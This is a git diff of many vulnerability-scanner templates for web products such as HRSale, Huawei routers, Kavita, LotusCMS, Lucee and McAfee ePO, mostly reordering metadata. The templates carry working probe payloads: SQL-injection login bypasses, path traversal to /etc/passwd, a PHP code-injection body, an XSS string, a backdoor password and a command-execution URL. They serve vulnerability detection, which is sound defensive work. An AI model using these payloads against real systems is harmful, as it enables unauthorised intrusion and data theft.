http.html:"Hospital Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: hms,hospital,cms,xss,authenticated @@ -27,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&submit= - - | POST /hms/admin/patient-search.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml b/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml index c340012c49..b93d0107db 100644 --- a/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml +++ b/http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: hrsale,lfi,edb metadata: max-request: 1 + tags: hrsale,lfi,edb http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/huatian-oa8000-sqli.yaml b/http/vulnerabilities/other/huatian-oa8000-sqli.yaml index 2778509a16..e8342222ef 100644 --- a/http/vulnerabilities/other/huatian-oa8000-sqli.yaml +++ b/http/vulnerabilities/other/huatian-oa8000-sqli.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="华天动力-OA8000" tags: huatian,oa,sqli diff --git a/http/vulnerabilities/other/huawei-hg659-lfi.yaml b/http/vulnerabilities/other/huawei-hg659-lfi.yaml index 491133d73a..ba487e262d 100644 --- a/http/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/http/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,huawei metadata: max-request: 1 + tags: lfi,huawei http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/huawei-router-auth-bypass.yaml b/http/vulnerabilities/other/huawei-router-auth-bypass.yaml index afb9d0a882..c449e49eb7 100644 --- a/http/vulnerabilities/other/huawei-router-auth-bypass.yaml +++ b/http/vulnerabilities/other/huawei-router-auth-bypass.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/exploits/48310 classification: cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-288 - tags: auth-bypass,router,edb,huawei metadata: max-request: 1 + tags: auth-bypass,router,edb,huawei http: - raw: diff --git a/http/vulnerabilities/other/huijietong-cloud-fileread.yaml b/http/vulnerabilities/other/huijietong-cloud-fileread.yaml index 0623b1ac59..17590815c5 100644 --- a/http/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/http/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -3,8 +3,8 @@ id: huijietong-cloud-fileread info: name: Huijietong - Local File Inclusion author: princechaddha,ritikchaddha - description: Huijietong is vulnerable to local file inclusion. severity: high + description: Huijietong is vulnerable to local file inclusion. metadata: max-request: 2 fofa-query: body="/him/api/rest/v1.0/node/role" @@ -14,11 +14,13 @@ http: - method: POST path: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/etc/passwd' - method: POST path: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/Windows/win.ini' matchers-condition: and diff --git a/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml b/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml index 094557fd1d..ae91594891 100755 --- a/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml +++ b/http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml @@ -7,9 +7,9 @@ info: description: | Huiwen library bibliographic retrieval system /include/config.properties file contains sensitive information, attackers can directly access to obtain information metadata: + verified: true max-request: 1 fofa-query: app="汇文软件-书目检索系统" - verified: true tags: huiwen,exposure,misconfig http: @@ -31,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/other/icewarp-open-redirect.yaml b/http/vulnerabilities/other/icewarp-open-redirect.yaml index 999d93e6ac..f432736168 100644 --- a/http/vulnerabilities/other/icewarp-open-redirect.yaml +++ b/http/vulnerabilities/other/icewarp-open-redirect.yaml @@ -11,8 +11,8 @@ info: cvss-score: 6.1 cwe-id: CWE-601 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"icewarp" tags: icewarp,redirect diff --git a/http/vulnerabilities/other/icewarp-webclient-rce.yaml b/http/vulnerabilities/other/icewarp-webclient-rce.yaml index 13f7dd61b5..b563713b1b 100644 --- a/http/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/http/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -8,7 +8,7 @@ info: IceWarp WebClient is susceptible to remote code execution. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 1 diff --git a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml index 69cf2914f2..09db4365fe 100644 --- a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml +++ b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml @@ -32,6 +32,7 @@ http: redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/vulnerabilities/other/interlib-fileread.yaml b/http/vulnerabilities/other/interlib-fileread.yaml index e15e90557e..fc2a31ac3f 100644 --- a/http/vulnerabilities/other/interlib-fileread.yaml +++ b/http/vulnerabilities/other/interlib-fileread.yaml @@ -3,17 +3,17 @@ id: interlib-fileread info: name: Interlib - Local File Inclusion author: pikpikcu - description: Interlib is vulnerable to local file inclusion. severity: high + description: Interlib is vulnerable to local file inclusion. reference: - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: interlib,lfi metadata: max-request: 2 + tags: interlib,lfi http: - method: GET @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/java-melody-xss.yaml b/http/vulnerabilities/other/java-melody-xss.yaml index 4ff2494321..f8b1658127 100644 --- a/http/vulnerabilities/other/java-melody-xss.yaml +++ b/http/vulnerabilities/other/java-melody-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,javamelody metadata: max-request: 1 + tags: xss,javamelody http: - method: GET diff --git a/http/vulnerabilities/other/jeewms-lfi.yaml b/http/vulnerabilities/other/jeewms-lfi.yaml index 4396a29cd7..7067dd562f 100644 --- a/http/vulnerabilities/other/jeewms-lfi.yaml +++ b/http/vulnerabilities/other/jeewms-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: jeewms,lfi metadata: max-request: 2 + tags: jeewms,lfi http: - raw: @@ -21,7 +21,6 @@ http: GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} @@ -29,7 +28,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index 43e1c44b1a..d99a2b98df 100644 --- a/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml - tags: jfrog metadata: max-request: 1 + tags: jfrog http: - raw: diff --git a/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml b/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml index 852284e62f..2c014edf7c 100644 --- a/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml +++ b/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: jreport,jinfornet,lfi metadata: max-request: 1 + tags: jreport,jinfornet,lfi http: - method: GET diff --git a/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml b/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml index 01133da88c..1d37319917 100644 --- a/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml +++ b/http/vulnerabilities/other/joomla-com-fabrik-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: joomla,lfi,edb metadata: max-request: 1 + tags: joomla,lfi,edb http: - method: GET diff --git a/http/vulnerabilities/other/kafdrop-xss.yaml b/http/vulnerabilities/other/kafdrop-xss.yaml index 1a0b69abad..a87cc018a2 100644 --- a/http/vulnerabilities/other/kafdrop-xss.yaml +++ b/http/vulnerabilities/other/kafdrop-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: kafdrop,xss metadata: max-request: 1 + tags: kafdrop,xss http: - method: GET diff --git a/http/vulnerabilities/other/karel-ip-phone-lfi.yaml b/http/vulnerabilities/other/karel-ip-phone-lfi.yaml index 5cb6b8b710..7d35e52b2f 100644 --- a/http/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/http/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -12,19 +12,20 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: karel,lfi metadata: max-request: 1 + tags: karel,lfi http: - method: GET path: - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd" + headers: Authorization: Basic YWRtaW46YWRtaW4= + matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/other/kavita-lfi.yaml b/http/vulnerabilities/other/kavita-lfi.yaml index 355de0c3ac..b5d2b502a2 100644 --- a/http/vulnerabilities/other/kavita-lfi.yaml +++ b/http/vulnerabilities/other/kavita-lfi.yaml @@ -8,15 +8,15 @@ info: Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload. reference: - https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/ - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"kavita" - tags: kavita,lfi,huntr classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"kavita" + tags: kavita,lfi,huntr http: - method: GET diff --git a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 75cb444fff..98b88fe467 100644 --- a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -7,9 +7,9 @@ info: description: KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php - tags: kevinlab,backdoor metadata: max-request: 1 + tags: kevinlab,backdoor http: - raw: diff --git a/http/vulnerabilities/other/kevinlab-bems-sqli.yaml b/http/vulnerabilities/other/kevinlab-bems-sqli.yaml index d12f9cf07e..9eb6b20623 100644 --- a/http/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/http/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -11,11 +11,11 @@ info: - https://packetstormsecurity.com/files/163572/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: kevinlab,sqli,edb,packetstorm metadata: max-request: 1 + tags: kevinlab,sqli,edb,packetstorm http: - raw: @@ -34,6 +34,7 @@ http: - "XPATH syntax error" - ": '\\ZSL1ZSL'" condition: and + - type: status status: - 200 diff --git a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml index 6c340e7005..6d3cd2ad5d 100644 --- a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -8,9 +8,9 @@ info: KevinLAB HEMS has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php - tags: kevinlab,default-login,backdoor metadata: max-request: 1 + tags: kevinlab,default-login,backdoor http: - raw: @@ -25,7 +25,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/vulnerabilities/other/keycloak-xss.yaml b/http/vulnerabilities/other/keycloak-xss.yaml index be32070449..6f9f19068f 100644 --- a/http/vulnerabilities/other/keycloak-xss.yaml +++ b/http/vulnerabilities/other/keycloak-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: keycloak,xss metadata: max-request: 1 + tags: keycloak,xss http: - raw: diff --git a/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml b/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml index b3a442c1b3..bd96efb6e0 100644 --- a/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml +++ b/http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: kingdee,lfi,traversal metadata: max-request: 2 + tags: kingdee,lfi,traversal http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix=" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/kingdee-erp-rce.yaml b/http/vulnerabilities/other/kingdee-erp-rce.yaml index cbcc086fe9..550f0d2e23 100644 --- a/http/vulnerabilities/other/kingdee-erp-rce.yaml +++ b/http/vulnerabilities/other/kingdee-erp-rce.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%87%91%E8%9D%B6OA/%E9%87%91%E8%9D%B6OA%20%E4%BA%91%E6%98%9F%E7%A9%BA%20kdsvc%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="金蝶云星空-管理中心" tags: kingdee-erp,rce,intrusive diff --git a/http/vulnerabilities/other/kingsoft-v8-file-read.yaml b/http/vulnerabilities/other/kingsoft-v8-file-read.yaml index 973dd91ed8..04fa52ba64 100644 --- a/http/vulnerabilities/other/kingsoft-v8-file-read.yaml +++ b/http/vulnerabilities/other/kingsoft-v8-file-read.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: kingsoft,lfi metadata: max-request: 1 + tags: kingsoft,lfi http: - method: GET diff --git a/http/vulnerabilities/other/kodak-network-lfi.yaml b/http/vulnerabilities/other/kodak-network-lfi.yaml index c39b7ff202..7690e4acd8 100644 --- a/http/vulnerabilities/other/kodak-network-lfi.yaml +++ b/http/vulnerabilities/other/kodak-network-lfi.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E7%A7%91%E8%BE%BE%20%E7%BD%91%E7%BB%9C%E9%94%AE%E7%9B%98%E6%8E%A7%E5%88%B6%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "网络键盘控制台" tags: lfi,kedacom,network diff --git a/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml b/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml index 4f861433a1..1f5cf129a5 100644 --- a/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml +++ b/http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: edb,printer,iot,kyocera,lfi metadata: max-request: 1 + tags: edb,printer,iot,kyocera,lfi http: - method: GET diff --git a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml index 30f75be6c6..7a277e0d23 100644 --- a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml +++ b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml @@ -11,8 +11,8 @@ info: - https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="Landray-OA系统" tags: landray,rce,oast diff --git a/http/vulnerabilities/other/landray-oa-erp-data-rce.yaml b/http/vulnerabilities/other/landray-oa-erp-data-rce.yaml index 7284aa77ef..6cd9c93052 100644 --- a/http/vulnerabilities/other/landray-oa-erp-data-rce.yaml +++ b/http/vulnerabilities/other/landray-oa-erp-data-rce.yaml @@ -10,8 +10,8 @@ info: - https://cn-sec.com/archives/1249492.html - https://github.com/ax1sX/SecurityList/blob/main/Java_OA/LandrayEkpAudit.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="Landray-OA系统" tags: landray,rce diff --git a/http/vulnerabilities/other/laravel-filemanager-lfi.yaml b/http/vulnerabilities/other/laravel-filemanager-lfi.yaml index aa1177b16b..5769740571 100644 --- a/http/vulnerabilities/other/laravel-filemanager-lfi.yaml +++ b/http/vulnerabilities/other/laravel-filemanager-lfi.yaml @@ -10,9 +10,9 @@ info: - https://github.com/UniSharp/laravel-filemanager metadata: max-request: 1 - google-query: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io shodan-query: http.html:"Laravel FileManager" - tags: lfr,edb,lfi,unisharp,laravel,filemanager,fileupload + google-query: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io + tags: lfr,edb,lfi,unisharp,laravel,filemanager,fileupload,intrusive http: - method: GET diff --git a/http/vulnerabilities/other/lean-value-listing.yaml b/http/vulnerabilities/other/lean-value-listing.yaml index 82871b48cf..9465c6869b 100644 --- a/http/vulnerabilities/other/lean-value-listing.yaml +++ b/http/vulnerabilities/other/lean-value-listing.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%90%89%E6%8B%89%E7%A7%91%E6%8A%80%20LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20Business%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "Supperd By 吉拉科技" tags: lean-value,misconfig,listing diff --git a/http/vulnerabilities/other/loancms-sqli.yaml b/http/vulnerabilities/other/loancms-sqli.yaml index 1b6336a914..45b99a6723 100644 --- a/http/vulnerabilities/other/loancms-sqli.yaml +++ b/http/vulnerabilities/other/loancms-sqli.yaml @@ -11,11 +11,11 @@ info: - https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 2 verified: true + max-request: 2 tags: auth-bypass,cms,packetstorm,edb,loancms,sqli http: @@ -26,12 +26,12 @@ http: Content-Type: application/x-www-form-urlencoded username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}} - - | GET /index.php?page=home HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/lotuscms-rce.yaml b/http/vulnerabilities/other/lotuscms-rce.yaml index c8ca99b072..d5cb57dbb6 100644 --- a/http/vulnerabilities/other/lotuscms-rce.yaml +++ b/http/vulnerabilities/other/lotuscms-rce.yaml @@ -10,11 +10,11 @@ info: - https://github.com/Hood3dRob1n/LotusCMS-Exploit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: lotuscms,rce metadata: max-request: 2 + tags: lotuscms,rce http: - method: POST @@ -24,6 +24,7 @@ http: headers: Content-Type: application/x-www-form-urlencoded + body: | page=index');${system('echo lotuscms_rce | md5sum')};# diff --git a/http/vulnerabilities/other/lucee-xss.yaml b/http/vulnerabilities/other/lucee-xss.yaml index 470550b807..665ad1022f 100644 --- a/http/vulnerabilities/other/lucee-xss.yaml +++ b/http/vulnerabilities/other/lucee-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: lucee,xss,unauth metadata: max-request: 2 + tags: lucee,xss,unauth,intrusive http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index ab7c4452d1..dc1cc9df2b 100644 --- a/http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -7,9 +7,9 @@ info: description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint. reference: - https://www.exploit-db.com/exploits/14991 - tags: luftguitar,edb metadata: max-request: 1 + tags: luftguitar,edb http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/vulnerabilities/other/maccmsv10-backdoor.yaml b/http/vulnerabilities/other/maccmsv10-backdoor.yaml index 660e15d8e3..d20565d6cb 100644 --- a/http/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/http/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -9,17 +9,19 @@ info: - https://github.com/chaitin/xray/blob/master/pocs/maccmsv10-backdoor.yml classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: maccmsv10,rce,backdoor metadata: max-request: 1 + tags: maccmsv10,rce,backdoor http: - method: POST path: - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" + body: "getpwd=WorldFilledWithLove" + headers: Content-Type: application/x-www-form-urlencoded diff --git a/http/vulnerabilities/other/magicflow-lfi.yaml b/http/vulnerabilities/other/magicflow-lfi.yaml index 04c7cdd838..3ef5c809d2 100644 --- a/http/vulnerabilities/other/magicflow-lfi.yaml +++ b/http/vulnerabilities/other/magicflow-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: magicflow,lfi metadata: max-request: 2 + tags: magicflow,lfi http: - method: GET @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/vulnerabilities/other/maltrail-rce.yaml b/http/vulnerabilities/other/maltrail-rce.yaml index 2851c2a091..f554b801d0 100644 --- a/http/vulnerabilities/other/maltrail-rce.yaml +++ b/http/vulnerabilities/other/maltrail-rce.yaml @@ -12,10 +12,10 @@ info: - https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/ - https://github.com/stamparm/maltrail/commit/a299967318cc226c18a6a07d1be708e3f21edd39 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: "Server: Maltrail" - tags: maltrail,rce,oast,oos + tags: huntr,maltrail,rce,oast,oos http: - raw: diff --git a/http/vulnerabilities/other/mcafee-epo-rce.yaml b/http/vulnerabilities/other/mcafee-epo-rce.yaml index 47bb71eb30..999604359c 100644 --- a/http/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/http/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,23 +8,26 @@ info: McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - tags: mcafee,rce, metadata: max-request: 1 + tags: mcafee,rce, http: - method: GET path: - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "text/html" part: header + - type: regex regex: - "Volume (in drive [A-Z]|Serial Number) is" diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index 3a68cb0ce7..1eb2a796e7 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -15,9 +15,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: title:"Metabase" - verified: true tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/other/metinfo-lfi.yaml b/http/vulnerabilities/other/metinfo-lfi.yaml index e8a741ea7f..624a831afa 100644 --- a/http/vulnerabilities/other/metinfo-lfi.yaml +++ b/http/vulnerabilities/other/metinfo-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: metinfo,lfi metadata: max-request: 3 + tags: metinfo,lfi http: - method: GET @@ -23,9 +23,9 @@ http: - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "con_db_pass" diff --git a/http/vulnerabilities/other/microstrategy-ssrf.yaml 